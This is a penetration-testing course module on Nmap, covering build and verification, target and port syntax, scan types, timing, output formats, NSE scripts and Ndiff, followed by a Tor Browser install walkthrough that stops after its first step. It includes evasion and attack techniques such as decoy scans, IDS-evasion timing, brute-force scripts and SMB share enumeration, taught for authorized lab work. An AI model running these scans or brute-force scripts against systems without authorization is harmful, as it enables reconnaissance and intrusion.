Module 04 - Penetration Testing

Nmap, or Network Mapper, is an open-source tool used for network scanning, asset discovery, and security profiling. It allows users to identify available hosts, services, and potential security vulnerabilities through various scanning techniques. The document provides a comprehensive guide on Nmap's features, installation, configuration, and usage commands.
NMAP

Nmap
What is Nmap?

Network MAPper - an open-source tool for network scanning
Nmap is a very popular, powerful, free and well-documented utility
Good for IT auditing, asset discovery, security profiling and penetration testing

www.cybexer.com 2
What does Nmap do?

Sends raw IP packets to determine the available hosts and the services they expose
Helps to identify security holes

Brief history of Nmap

✓ September 1997 - 1st release of Nmap
✓ December 1998 - Nmap version 2.00 is publicly released
✓ July 2007 - Zenmap graphical front-end released
✓ October 2020 - Nmap version 7.90 released

The full Nmap package contains several additional tools

Zenmap - advanced GUI (Linux, Windows, Mac OS)
Ncat - data transfer, redirection, and debugging tool
Ndiff - scan results comparing utility
Nping - packet generation and response analysis tool
Build your own Nmap

• download
• compile
• verify
• run

Download the latest release from nmap.org with 'wget'

• cd /opt
• wget https://nmap.org/dist/nmap-7.92.tar.bz2

To save the downloaded file under a different filename, use the '-O' option
• wget https://nmap.org/dist/nmap-7.92.tar.bz2 -O /opt/nmap-custom.tar.bz2

If 'wget' is missing on your system, use the 'curl' command to get the Nmap source code

• cd /opt
• curl https://nmap.org/dist/nmap-7.92.tar.bz2 -o nmap-7.92.tar.bz2

Before compiling, check that the archive really comes from the Nmap project: detached GPG signatures ('.asc') and digest files for every release are published under https://nmap.org/dist/sigs/. A scanner you run as root is not something to build from an unverified download.

Extract the downloaded Nmap archive
• tar -jvxf nmap-7.92.tar.bz2

Keep in mind that the archive will be extracted to the current folder

Extract the archive to a different folder

• tar -jvxf nmap-7.92.tar.bz2 -C /tmp/

To make the extraction silent, remove the 'v' option

Configure Nmap

• cd nmap-7.92/
• ./configure --help

• ./configure --prefix=/opt/nmap

If '--prefix=<path>' is not given, the default installation goes to the '/usr/local' folder

Verify the output of the './configure' command

If a required feature is needed but Nmap is not compiling with support for it, the corresponding development library must be installed first (e.g. the OpenSSL headers: 'apt-get install libssl-dev'; older Debian-based systems named this package libssl1.0-dev)

Clean up from the previous './configure' command
• make clean

After the missing libraries are installed, re-run the './configure' command
• ./configure --prefix=/opt/nmap

Build Nmap

• make

Verify that the 'make' command finished without errors (some warnings may occur)

If 'make' finishes without errors, proceed with the installation of Nmap
• make install

Root privileges (or write access to the prefix directory) are required during the "make install" phase.

Check the output of the 'make install' command.
If all went well, you should see the text "NMAP SUCCESSFULLY INSTALLED"

Verify the newly installed Nmap

• /opt/nmap/bin/nmap -V

Since Nmap is installed in a new/custom location, the $PATH environment variable should be adjusted

• echo $PATH

• export PATH=/opt/nmap/bin:$PATH
• echo $PATH

'export' only affects the current shell session; add the same line to your shell profile to make the change permanent.
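The download, verify, configure, make, install and $PATH steps above, collected into one script. This is an added example, not from the slides or from the Nmap project: it assumes the detached signature for a release is published as https://nmap.org/dist/sigs/<archive>.asc (the project's convention) and that the Nmap signing key is already in your GPG keyring; NMAP_VERSION, NMAP_PREFIX, NMAP_SRCDIR and NMAP_BUILD are variable names chosen here. Nothing is downloaded or built unless NMAP_BUILD=1 is set, so the file can also be sourced just to get the add_to_path helper, which avoids the duplicate entries that re-running 'export PATH=/opt/nmap/bin:$PATH' produces.

```shell
#!/bin/sh
# Added example: the "build your own Nmap" procedure as one script, with the
# signature check the slides leave out. Assumptions (not from the slides): the
# release signature lives at https://nmap.org/dist/sigs/<archive>.asc and the
# Nmap signing key is already imported into gpg.
set -eu

NMAP_VERSION=${NMAP_VERSION:-7.92}
NMAP_PREFIX=${NMAP_PREFIX:-/opt/nmap}
NMAP_SRCDIR=${NMAP_SRCDIR:-/opt}
ARCHIVE="nmap-$NMAP_VERSION.tar.bz2"

# Prepend DIR to a PATH-style string only if it is not already present, so
# running this repeatedly does not grow $PATH.  add_to_path DIR [PATHSTRING]
add_to_path() {
    dir=$1
    cur=${2-${PATH:-}}
    case ":$cur:" in
        *":$dir:"*) printf '%s\n' "$cur" ;;       # already there: unchanged
        "::")       printf '%s\n' "$dir" ;;       # empty PATH string
        *)          printf '%s\n' "$dir:$cur" ;;
    esac
}

# Download URL to FILE with wget, falling back to curl (as the slides do).
fetch() {
    if command -v wget >/dev/null 2>&1; then wget -q -O "$2" "$1"
    else curl -fsSL -o "$2" "$1"; fi
}

build_nmap() {
    cd "$NMAP_SRCDIR"
    fetch "https://nmap.org/dist/$ARCHIVE" "$ARCHIVE"
    fetch "https://nmap.org/dist/sigs/$ARCHIVE.asc" "$ARCHIVE.asc"
    # Refuse to compile anything whose signature does not verify.
    gpg --verify "$ARCHIVE.asc" "$ARCHIVE"
    tar -jxf "$ARCHIVE"
    cd "nmap-$NMAP_VERSION"
    ./configure --prefix="$NMAP_PREFIX"
    make
    # 'make install' needs write access to $NMAP_PREFIX (root for /opt/nmap).
    make install
    "$NMAP_PREFIX/bin/nmap" -V
    PATH=$(add_to_path "$NMAP_PREFIX/bin"); export PATH
}

# Only build when explicitly asked, so sourcing this file has no side effects.
if [ "${NMAP_BUILD:-0}" = "1" ]; then
    build_nmap
fi
```

Run it with 'NMAP_BUILD=1 sh build-nmap.sh' (as root, or with NMAP_PREFIX pointing at a directory you own); a failed 'gpg --verify' stops the script before anything is extracted.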
Let's start scanning

Running Nmap without any arguments shows the basic usage options

• nmap

Basic scanning with Nmap
Everything on the Nmap command line that isn't an option (or option argument) is treated as a target host specification
Scan a single IP address
• nmap 127.0.0.1

Scan multiple targets
• nmap 127.0.0.1 10.21.32.5

Note! Change the 2nd and 3rd octets to the correct ones for your lab!

Scan targets with CIDR-style addressing
• nmap 10.XX.32.5/24

"/24" CIDR notation will scan 256 addresses, starting from 10.XX.32.0 and ending with 10.XX.32.255 (the network and broadcast addresses are included)

Scan a range of targets

• nmap 10.XX.32.100-105

Ranges can be specified for any network octet
• nmap 192.168.113-114,205.100-102,177
This target range will scan the following hosts
192.168.113.100, 192.168.113.101, 192.168.113.102, 192.168.113.177, 192.168.114.100, 192.168.114.101, 192.168.114.102, 192.168.114.177, 192.168.205.100, 192.168.205.101, 192.168.205.102 and 192.168.205.177

List Scan (-sL) - only shows the list of targets without performing any scans. Ideal for generating host lists and for checking a target expression before scanning it
• nmap -sL 192.168.113-114,205.100-102,177

Scan targets specified in a file. Target entries may be in any of the formats accepted by Nmap on the command line (IP address, hostname, CIDR, IPv6 etc.)
Each entry must be separated by one or more spaces, tabs, or newlines

Sample content of the target list file

Scan the target list from the file

• nmap -iL hosts.txt

Excluding targets from the scan

• nmap --exclude 10.10.10.11 10.10.10.0/28

Multiple exclude targets are allowed (must be comma-separated)
--exclude 10.10.10.11,editor.cnn.com,10.11.12.90/30

Excluding targets using a list file

• nmap --excludefile excluded.txt 10.10.10.0/24

'excluded.txt' must contain the IP address(es), hostname(s) or CIDR(s) of the excluded targets
Each entry must be separated by one or more spaces, tabs, or newlines
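Octet-range target expressions like '192.168.113-114,205.100-102,177' expand to the Cartesian product of the per-octet lists. The shell functions below reproduce that expansion so you can see, and count, what 'nmap -sL' would list before launching a scan. This is an added example, not part of the slides or of Nmap: it handles only dotted-decimal IPv4 with per-octet lists and ranges (including Nmap's '-' shorthand for 0-255), not CIDR or hostnames, and the function names are chosen here.

```shell
#!/bin/sh
# Added example (not from the slides, not Nmap's code): expand an Nmap
# octet-range target expression into the host list that 'nmap -sL' would print.
# Scope: dotted-decimal IPv4 with per-octet lists/ranges and the '-' shorthand
# for 0-255. CIDR notation and hostnames are not handled here.
set -eu

# "113-114,205" -> 113 114 205, one per line. "-" alone means 0-255,
# "-5" means 0-5 and "250-" means 250-255, as Nmap accepts them.
expand_octet() {
    printf '%s\n' "$1" | tr ',' '\n' | while IFS= read -r part; do
        case $part in
            -)    lo=0; hi=255 ;;
            *-*)  lo=${part%-*}; hi=${part#*-}
                  [ -n "$lo" ] || lo=0
                  [ -n "$hi" ] || hi=255 ;;
            *)    lo=$part; hi=$part ;;
        esac
        i=$lo
        while [ "$i" -le "$hi" ]; do
            printf '%s\n' "$i"
            i=$((i + 1))
        done
    done
}

# Cartesian product of the four octet lists, in the same order Nmap uses
# (first octet varies slowest, last octet fastest).
expand_targets() {
    spec=$1
    o1=${spec%%.*}; rest=${spec#*.}
    o2=${rest%%.*};  rest=${rest#*.}
    o3=${rest%%.*};  o4=${rest#*.}
    expand_octet "$o1" | while IFS= read -r a; do
        expand_octet "$o2" | while IFS= read -r b; do
            expand_octet "$o3" | while IFS= read -r c; do
                expand_octet "$o4" | while IFS= read -r d; do
                    printf '%s.%s.%s.%s\n' "$a" "$b" "$c" "$d"
                done
            done
        done
    done
}

# Number of addresses a target expression covers; useful before a large scan.
count_targets() {
    expand_targets "$1" | wc -l | tr -d ' '
}
```

'expand_targets 192.168.113-114,205.100-102,177' prints the twelve hosts listed above in the same order; 'count_targets 10.0.0.-' answers 256 without touching the network.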
Scan IPv6 targets
• nmap -6 fd03:c01:XX:32::2

To scan an IPv6 address, both the source and the target host must be configured for IPv6

Scanning of IPv6 targets supports the same target options as IPv4 targets:
--exclude
--excludefile

Do not run DNS lookups for scanned targets
• nmap -n srv.studentXX.csirt.crp

Since reverse DNS resolution can be slow, using '-n' may speed up the scan

Use custom DNS servers for DNS resolution
• nmap --dns-servers 10.103.176.2 files.csirt.crp

Note! Check your DNS server IP in /etc/resolv.conf

By default, Nmap scans only the first IP address a hostname resolves to. For example, running "nmap cnn.com" will scan only the first resolved IP address (151.101.65.67 in the slide's example) and print a note listing the other addresses it did not scan.

To scan every address the hostname resolves to, use the '--resolve-all' option (available since Nmap 7.70)
• nmap --resolve-all cnn.com

'-R' is a different option: it forces reverse DNS resolution of every target, including hosts that appear to be down (by default Nmap only resolves names for hosts that are up)

By default (without any port options), Nmap scans the 1000 most common ports for each scanned protocol.
To scan a specific port, use '-p <port_number>'
• nmap -p 80 files.csirt.crp

Different ports can be comma-separated
• nmap -p 80,443,8080 files.csirt.crp

Or port ranges can be given with a hyphen

• nmap -p 70-100,200-250,1000-1024 files.csirt.crp

Excluding port numbers from scanning
• nmap --exclude-ports 22 files.csirt.crp

Multiple ports and port ranges can also be used

• nmap --exclude-ports 22,70-80,443 files.csirt.crp

To scan all ports use the '-p-' option
• nmap -p- srv.studentXX.csirt.crp

If you forget the maximum port number, you can always calculate it with the formula 2^16 - 1 = 65535. '-p-' means 1-65535; port 0 is only included if you ask for it explicitly ('-p0-')

Specifying a particular protocol for particular ports
• nmap -sSU -p U:53,111,161,T:21-25,80,139,8080 srv.studentXX.csirt.crp

This will scan UDP ports 53, 111 and 161, and TCP ports 21 to 25, 80, 139 and 8080. A 'U:' or 'T:' prefix applies to every port that follows it until the next prefix.

By default, Nmap scans ports in random order. If sequential port scanning is needed (e.g. for IDS/IPS or firewall testing), the '-r' option must be specified
• nmap -r -p 100-200 srv.studentXX.csirt.crp

The '-r' option scans ports from lowest to highest

Scan the 'most popular' ports on the targets. The number '10' is the number of top ports to be scanned
• nmap --top-ports 10 srv.studentXX.csirt.crp

Nmap uses its own database of port popularity (/usr/share/nmap/nmap-services on a packaged install; /opt/nmap/share/nmap/nmap-services for the build above).
The '--top-ports' option is very useful for initial scans and large-scale scans.
The '--top-ports' option can be combined with the '--exclude-ports' option

Depending on the scan type and options, it is sometimes reasonable to run a fast scan against the targets
The '-F' option scans the 100 top ports
• nmap -F srv.studentXX.csirt.crp

During a default scan, Nmap will display open, filtered and closed ports (large numbers of ports in the same state are summarized as "Not shown: ...")

If you want to display only 'open' ports, the option '--open' should be used
• nmap -sS -Pn -n --open 10.XX.32.5

Definition of port states
'open' - an application on the target machine is listening for connections/packets on that port
'filtered' - a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed
'closed' - no application is listening on the port, though one could open up at any time
Nmap also reports 'unfiltered' (the port is reachable but Nmap cannot tell whether it is open or closed; only the ACK scan classifies ports this way) and the combined states 'open|filtered' and 'closed|filtered' when a scan type cannot distinguish the two (UDP scans produce 'open|filtered' very often)
To detect the OS (Operating System) of the target, Nmap uses TCP/IP stack fingerprinting.
Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses.
After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to its nmap-os-db database of more than 2600 known OS fingerprints and prints the OS details if there is a match.

Detecting the OS (Operating System)
• nmap -O srv.studentXX.csirt.crp

OS detection needs raw packets, so it requires root privileges, and it is most reliable when the target has at least one open and one closed TCP port.

Aggressive scan
• nmap -A srv.studentXX.csirt.crp

An aggressive scan gives much more information about the scanned targets and running services than a default scan, but it is also more time consuming.
An aggressive scan enables OS detection (-O), version detection of the discovered services (-sV), default script scanning (-sC) and traceroute (--traceroute).
An aggressive scan is also more intrusive than a default scan, since Nmap sends far more probes to the target.

By default, when run with root privileges, Nmap performs a TCP SYN scan. The parameter '-sS' stands for SYN scan
• nmap -sS 127.0.0.1

Note! A SYN scan requires 'root' privileges (raw sockets). Without them, Nmap defaults to the TCP Connect scan, and an explicit '-sS' is refused.

TCP SYN scan is the most preferred scanning technique.

It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

It is also relatively unobtrusive and stealthy since it never completes TCP connections, so the scan usually does not show up in application logs (the SYN packets are still visible to firewalls and IDS).

To perform a TCP Connect scan use the '-sT' option
• nmap -sT 127.0.0.1

Note! A TCP Connect scan can be run as an unprivileged user; because it completes the three-way handshake, the target service sees (and may log) a connection.

By default, Nmap scans for TCP services. To check UDP services running on the target hosts use the '-sU' option
• nmap -sU 127.0.0.1

Since UDP and TCP are completely different protocols, be careful when scanning large UDP port ranges: most hosts rate-limit the ICMP 'port unreachable' replies Nmap relies on, so a full UDP port scan can take hours, and ports that never answer are reported as 'open|filtered'.
It's highly preferable to run UDP scans against specific, most-used ports or to limit the number of UDP ports with the '--top-ports 10' option
• nmap -sU --top-ports 10 10.XX.32.5

Nmap allows combining TCP and UDP port scans. Use '-sU' together with a TCP scan type ('-sT', or '-sS' when running as root). You can add any other options described above.

• nmap -sT -sU 127.0.0.1
For different purposes Nmap allows fine-grained timing controls. Timing templates are selected with the '-T' flag followed by a number from 0 to 5

-T0 - paranoid mode, 1 probe sent every 5 minutes
-T1 - sneaky mode, 15 seconds between each probe
-T2 - polite mode, 0.4 seconds between each probe
-T3 - normal mode, this is the default scanning setting. It sends probes in parallel
-T4 - aggressive mode, runs with smaller timeouts and fewer retries
-T5 - insane mode, runs with even smaller timeouts and fewer retries than '-T4' mode

-T0 to -T2 serialize the probes and exist for IDS evasion; -T4 and -T5 can miss ports on slow or congested links, so use -T4 on reliable networks and keep -T5 for the lab.

Compare scanning times with different timing templates. First a -T1 scan of a single port:
• nmap -sS -T1 -p 22 127.0.0.1

Then the same scan with -T2 (and with the default -T3 for reference):
• nmap -sS -T2 -p 22 127.0.0.1
It is important to save Nmap port scanning results. There are many good reasons to do that

- stay stealthy (avoid scanning the same targets many times)
- compare different Nmap scan results
- share with other team members
- import scan results into other tools and applications

Nmap scan results come in 5 different formats
- interactive output (default stdout/screen output)
- normal output (-oN), saves the interactive output to a file
- XML output (-oX), saves the Nmap scan results to a file in XML format
- grepable output (-oG), saves the Nmap scan results to a file with one line per host, which can be searched and parsed with standard Linux tools such as grep, awk, sed etc. (deprecated in favour of XML, but still convenient for quick shell pipelines)
- script kiddie output (-oS), saves the Nmap scan results to a file written in 'hacker' leet-speak (a joke format, not for real use)

Save Nmap scan results in normal format
• nmap -oN output.txt 10.XX.32.5

After the scan, the 'output.txt' file with the scan results will be created in the current folder

Save Nmap scan results in grepable format
• nmap -oG outputg.txt 10.XX.32.5

After the scan, the 'outputg.txt' file with the scan results will be created in the current folder

Save Nmap scan results in XML format
• nmap -oX output.xml 10.XX.32.5

After the scan, the 'output.xml' file with the scan results will be created in the current folder. The file format is XML

Save Nmap scan results in script kiddie format
• nmap -oS outputs.txt 10.XX.32.5

After the scan, the 'outputs.txt' file with the scan results will be created in the current folder

Sometimes there's a need to save Nmap scan results in different formats. Instead of specifying several different '-o' options, it is possible to save the output in all formats (except the script kiddie format) at once
• nmap -oA scan01 10.XX.32.5

Option '-oA scan01' means that after Nmap finishes scanning, 3 different output files with the scanning results will be created, each with the prefix 'scan01':
.gnmap extension is for the 'grepable' file format
.nmap extension is for the normal file format
.xml extension is for the XML file format
• ls -la scan01.*

Note that '-oN', '-oG', '-oX' and '-oA' overwrite an existing file of the same name; use '--append-output' to append instead.

XML output is one of the most important output types, as it can be converted to HTML, easily parsed by programs such as Nmap graphical user interfaces, or imported into databases or applications.

Let's convert an Nmap XML output file to an HTML file
We use the xsltproc command, which is a command-line XSLT processor
• xsltproc scan01.xml -o /var/www/html/scan01.html

xsltproc follows the stylesheet reference (nmap.xsl) that Nmap writes into the XML header; if that file is not present on this machine, re-run the scan with '--webxml' so the XML points at the stylesheet on nmap.org, or pass the stylesheet path as the first argument to xsltproc.

Start the Apache web server on your Kali Linux

• service apache2 start

Open the created HTML page in a web browser
http://10.XX.32.2/scan01.html

The HTML page now publishes your scan results to anyone who can reach port 80 on your Kali machine; stop Apache when you are done.
By default, Nmap does not show progress during a scan. While a scan is running, press any key (e.g. 'space' or 'enter') to print the current progress; 'v' increases the verbosity and 'd' the debugging level for the rest of the scan

To display scan statistics periodically, use the '--stats-every' option followed by a number which defines the interval of the status update
• nmap --stats-every 10s 10.XX.32.2/24

If you need to identify hosts which are online without actually port scanning them, Nmap can be run in 'ping-sweep' (host discovery only) mode
• nmap -sn 10.XX.32.0/24

Older versions of Nmap used the option '-sP' for this; it is still accepted as an alias

Depending on the network setup, firewalls may be blocking ICMP requests. When that happens, Nmap will not port scan a target that does not appear to be up. To skip host discovery and run the port scan against all targets regardless, use the '-Pn' option
• nmap -Pn 192.168.113.1

This type of scan helps against firewalls which block ICMP probes, at the cost of spending time on addresses that are really down

Older versions of Nmap used the '-P0' option to disable ping requests; it is still accepted as an alias

Note that as root, Nmap host discovery is not just an ICMP echo: it also sends a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request, so a host that blocks ping alone is usually still detected.
Nmap - NSE scripts
Advanced Nmap usage with NSE scripts

NSE - Nmap Scripting Engine

NSE offers very powerful and flexible features. It allows users to write (and share) simple scripts using the Lua programming language.
NSE scripts allow automating a wide variety of networking tasks.

To get the HTTP title page information
• nmap -n -sS --script http-title --open -p 443 edition.cnn.com

The default location of the Nmap scripts is the '/usr/share/nmap/scripts' folder. There are over 600 different scripts
• ls -la /usr/share/nmap/scripts/

Let's review the 'http-title' NSE script
• less /usr/share/nmap/scripts/http-title.nse

When Nmap runs the 'http-title' script, it sends an HTTP GET request to the target server.
The target host and port are passed to the script by Nmap for every matching open port.
The response from the server is saved in the 'resp' variable

If the HTTP server responds with an HTTP redirect status code (30X), the HTTP title will be set to "Did not follow redirect to ...."

• nmap -n -sS --script http-title --open -p 80 edition.cnn.com

If the HTTP response has no body, script execution ends without output

If the HTTP response does have a body, the script searches for the HTML tag '<title>'.
Since the '<title>' tag can be written in different cases (Title, TITLE, tITLE etc.), a case-insensitive regular expression is used

If the HTTP body matches the regular expression, everything between the '<title>' and '</title>' tags is saved to the variable 'title'

If the HTML title is longer than 65 characters, the rest of the 'title' value is removed and '...' appended

Once the 'http-title' script finishes its execution, the HTTP 'title' is returned to Nmap's output (shown in the Nmap scan results)
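The extraction logic the slides walk through, reimplemented in shell/awk so it can be run against a captured HTTP response. This is an added example, not the Lua of http-title.nse and not from the slides: it mirrors the redirect, empty-body, case-insensitive '<title>' and 65-character truncation behaviour described above (the split into 62 characters plus '...' is an assumption about how the 65-character limit is applied), and the HTTP responses used to exercise it are constructed, not captured from any server.

```shell
#!/bin/sh
# Added example (not the NSE script itself): what http-title reports for one
# raw HTTP response read from stdin. Handles the cases the slides describe:
# 30x redirect, empty body, <title> in any case, truncation of long titles.
set -eu

http_title() {
    awk '
    { all = all $0 "\n" }
    END {
        gsub(/\r/, "", all)                       # tolerate CRLF line endings
        n    = index(all, "\n\n")                 # blank line = header/body boundary
        hdr  = n ? substr(all, 1, n) : all
        body = n ? substr(all, n + 2) : ""
        if (hdr ~ /^HTTP\/[0-9.]+ 3[0-9][0-9]/) { # redirect: report, do not follow
            loc = ""
            m = split(hdr, h, "\n")
            for (i = 2; i <= m; i++)
                if (tolower(h[i]) ~ /^location:/) { loc = h[i]; sub(/^[^:]*:[ \t]*/, "", loc) }
            print "Did not follow redirect to " loc
            exit
        }
        if (body ~ /^[ \t\n]*$/) exit             # no body: the script returns nothing
        low = tolower(body)                       # case-insensitive tag search
        if (!match(low, /<title[^>]*>/)) exit
        start = RSTART + RLENGTH
        if (!match(substr(low, start), /<\/title>/)) exit
        title = substr(body, start, RSTART - 1)   # text between the tags, original case
        gsub(/[ \t\n]+/, " ", title); sub(/^ /, "", title); sub(/ $/, "", title)
        if (length(title) > 65) title = substr(title, 1, 62) "..."   # assumed split
        print title
    }'
}
```

Feed it a saved response, e.g. 'ncat edition.cnn.com 80 < request.txt | http_title'; the constructed responses in the test show the three branches.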
HTTP is one of the most popular protocols in use today. Nmap has a large number of NSE scripts which allow complex scanning of web servers.

Scanning for supported HTTP methods
• nmap -p80 --script http-methods 10.XX.32.5

Discover interesting files and folders on a web server
• nmap -p80 --script http-enum 10.XX.32.5

Let's try some other NSE scripts
The 'whois-domain' script will query a WHOIS server and display information about the scanned domain
• nmap --script whois-domain cnn.com

The 'smb-enum-shares' script will attempt to list the remote shares on the target server.
For many NSE scripts it is advised to narrow the scan down to specific ports. In the case of remote shares, we will use port 445
• nmap -sS -Pn -n -p 445 --script smb-enum-shares 10.XX.32.5

Result of the remote share scan

Nmap allows combining several NSE scripts
• nmap --script ssl-cert,ssl-enum-ciphers -p 443 edition.cnn.com

In this example the 'ssl-cert' NSE script will show information about the SSL/TLS certificate of the target - CN, Issuer, certificate validity period, SAN records and other certificate information

'ssl-enum-ciphers' will enumerate the SSL/TLS protocol versions and cipher suites the server accepts, grade them and output the information

Some NSE scripts allow brute-forcing services for different usernames and/or passwords
• nmap --script vnc-brute -p 5901 10.XX.32.2

Brute-force scripts generate many failed logins (noisy in logs and able to lock accounts); run them only with authorization. To see the full list of brute-force scripts, run the following command in a terminal
• ls -al /usr/share/nmap/scripts/*brute*

Nmap allows combining NSE scripts with the same prefix. For example, there are many scripts with the 'http-' prefix:
http-google-malware
http-php-version
http-sql-injection
http-wordpress-users

To run all HTTP scripts against the target, use 'http-*' for the script option

• nmap -p80 --script "http-*" 10.XX.32.5

Note! Be careful when using many scripts: it will generate 'A LOT' of traffic, will run much longer and in some cases it can cause a denial of service on the target

NSE scripts have different categories. Some scripts are considered intrusive, while other scripts are pretty safe to run against the target systems
Run all non-intrusive scripts
• nmap --script "not intrusive" 10.XX.32.5
Run safe scripts
• nmap --script "safe" 10.XX.32.5
You can make very granular combinations of NSE scripts
• nmap --script "(default or safe or intrusive) and not http-*" 10.XX.32.5

Category names are only as reliable as the script author's judgement; check a script's 'categories' line (and read the script) before running it against production systems.
Nmap - decoy scan
Nmap allows running a decoy scan against the targets.
Nmap makes it appear to the remote host that the host(s) you specify as decoys are scanning the target network too.
It is generally a very effective technique for hiding your IP address among the decoys.
• nmap -sS -Pn -n -D192.168.1.1,192.168.2.2,10.10.10.10 10.XX.32.5

Caveats: your real address is still in the mix (Nmap places it at a random position unless you pin it with 'ME'), decoys only work for raw-packet scans such as -sS (not for -sT, version detection or NSE scripts, which need real connections), and decoys that are not up make it easy for the target to tell which sender is real. 'RND:5' lets Nmap pick 5 random decoy addresses.
Nmap - Ndiff
Sometimes you have to compare different scan results, to see which services and/or hosts appeared or disappeared between scans
ndiff - a utility to compare the results of Nmap scans
Install the 'ndiff' tool on Kali Linux (it is also part of the full Nmap source package built above)
• apt-get install ndiff

The Ndiff application takes two Nmap XML output files and prints the differences between them.
The differences observed are

· Host states (e.g. up to down)
· Port states (e.g. open to closed)
· Service versions (from -sV)
· OS matches (from -O)
· Script output

Let's compare two Nmap scan results
• ndiff scan1.xml scan2.xml

To see a more detailed comparison, use the '-v' option

• ndiff -v scan1.xml scan2.xml

Ndiff only compares what both scans recorded, so use the same options (ports, -sV, scripts) for the baseline and the follow-up scan; otherwise every difference in options shows up as a "change".
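The grepable format listed under the output formats above and the port-state comparison Ndiff performs, as one added shell example (not from the slides, not Nmap's or Ndiff's code). It parses the one-line-per-host '-oG' layout (tab-separated 'Host:', 'Ports:' and 'Ignored State:' fields, each port written as port/state/protocol/owner/service/rpc/version) and reports the open ports that appeared or disappeared between two scans. The two .gnmap files are constructed sample data with made-up hosts, written only so the example runs offline.

```shell
#!/bin/sh
# Added example (not from the slides; not Nmap's or Ndiff's code): parse
# grepable (-oG) output and diff the open ports of two scans.
# The two .gnmap files created below are constructed sample data.
set -eu

WORK=$(mktemp -d)
{
    printf '# Nmap 7.92 scan initiated as: nmap -oG scan1.gnmap 10.0.32.0/29\n'
    printf 'Host: 10.0.32.5 (srv)\tPorts: 22/open/tcp//ssh//OpenSSH 8.4p1/, 80/open/tcp//http//nginx/, 443/closed/tcp//https///\tIgnored State: filtered (997)\n'
    printf 'Host: 10.0.32.6 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: closed (999)\n'
    printf 'Host: 10.0.32.7 ()\tStatus: Down\n'
    printf '# Nmap done -- 3 IP addresses (2 hosts up) scanned\n'
} >"$WORK/scan1.gnmap"
{
    printf '# Nmap 7.92 scan initiated as: nmap -oG scan2.gnmap 10.0.32.0/29\n'
    printf 'Host: 10.0.32.5 (srv)\tPorts: 22/open/tcp//ssh//OpenSSH 8.4p1/, 80/closed/tcp//http///, 443/open/tcp//https//nginx/\tIgnored State: filtered (997)\n'
    printf 'Host: 10.0.32.6 ()\tPorts: 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (998)\n'
    printf 'Host: 10.0.32.7 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (999)\n'
    printf '# Nmap done -- 3 IP addresses (3 hosts up) scanned\n'
} >"$WORK/scan2.gnmap"

# Print "ip port/proto service" for every open port in a .gnmap file, sorted.
open_ports() {
    awk -F'\t' '
        /^Host: / {
            ip = $1; sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
            for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) {
                n = split(substr($i, 8), p, /, */)      # one entry per port
                for (j = 1; j <= n; j++) {
                    split(p[j], f, "/")   # port/state/proto/owner/service/rpc/version
                    if (f[2] == "open") print ip, f[1] "/" f[3], f[5]
                }
            }
        }' "$1" | sort
}

# Open ports only in the second scan are prefixed "+", only in the first "-".
diff_open() {
    a=$(mktemp); b=$(mktemp)
    open_ports "$1" >"$a"
    open_ports "$2" >"$b"
    comm -23 "$a" "$b" | sed 's/^/- /'
    comm -13 "$a" "$b" | sed 's/^/+ /'
    rm -f "$a" "$b"
}

diff_open "$WORK/scan1.gnmap" "$WORK/scan2.gnmap"
```

On the sample data this reports one port gone (10.0.32.5 80/tcp) and three new ones, including a host that was down in the first scan. For real results prefer the XML output and Ndiff; the grepable pipeline is the quick version for a shell session.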
Tor Browser
Tor Browser - installation
Tor Browser is a web browser using the Tor network. It has some extra features to enhance your anonymity and privacy.

The Tor network itself is designed to hide your original IP address from the sites you visit. It also encrypts the Internet traffic between your computer and the Tor exit node (traffic from the exit node to a plain-HTTP site is not encrypted by Tor).

All in all, Tor Browser:

• hides your IP from the destination
• does not save any account information (logins and passwords)
• does not save your web history
• has some extra tools to protect you from being identified (browser fingerprinting)

Tor Browser is now present in the Kali Linux repository, but we will go through the installation procedure step by step.

As with most software for Linux, there are several ways to download and/or install it.

The first way is to visit Tor's official site 'https://www.torproject.org' and download the needed version.
Here's a command that will download the latest version of the Tor Browser archive, extract all files from that archive, then move the extracted content to the '/root/tor/' folder and finally remove the downloaded Tor Browser archive
• temp="$(curl -s https://www.torproject.org/download/languages/)" && temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-]+_ALL.tar.xz' | tail -n 1` && wget -O tor-browser-linux64.tar.xz "https://www.torproject.org$temp2" && tar xvfJ tor-browser-linux64.tar.xz && rm -f tor-browser-linux64.tar.xz && mv tor-browser*/Browser/ ~/tor && rm -rf tor-browser*

Two things to keep in mind: the archive is used without checking its GPG signature (the Tor Project publishes a detached '.asc' signature next to every bundle), and the download page is scraped with a regular expression, so a change in the page layout or in the bundle file name silently breaks the command. The breakdown below matches the older '_en-US' bundle name; the multi-locale '_ALL' name above is what recent releases use.

Let's take the whole command to pieces and see how it works and what it does. As you have noticed, there are several places with '&&'
• temp="$(curl -s https://www.torproject.org/download/languages/)" && temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-]+_en-US.tar.xz' | tail -n 1` && wget -O tor-browser-linux64.tar.xz "https://www.torproject.org$temp2" && tar xvfJ tor-browser-linux64.tar.xz && rm -f tor-browser-linux64.tar.xz && mv tor-browser*/Browser/ ~/tor && rm -rf tor-browser*

The double ampersand (&&) separates different commands. The command after '&&' is executed only if the previous command finished successfully (exit status 0). So, we have the following 7 commands
1. temp="$(curl -s https://www.torproject.org/download/languages/)"
2. temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-]+_en-US.tar.xz' | tail -n 1`
3. wget -O tor-browser-linux64.tar.xz "https://www.torproject.org$temp2"
4. tar xvfJ tor-browser-linux64.tar.xz
5. rm -f tor-browser-linux64.tar.xz
6. mv tor-browser*/Browser/ ~/tor
7. rm -rf tor-browser*

Let's review all the commands one by one.
The first command fetches the content of the 'https://www.torproject.org/download/languages/' page using the 'curl' program and stores the result in the 'temp' variable ('-s' suppresses the progress meter)
1. temp="$(curl -s https://www.torproject.org/download/languages/)"

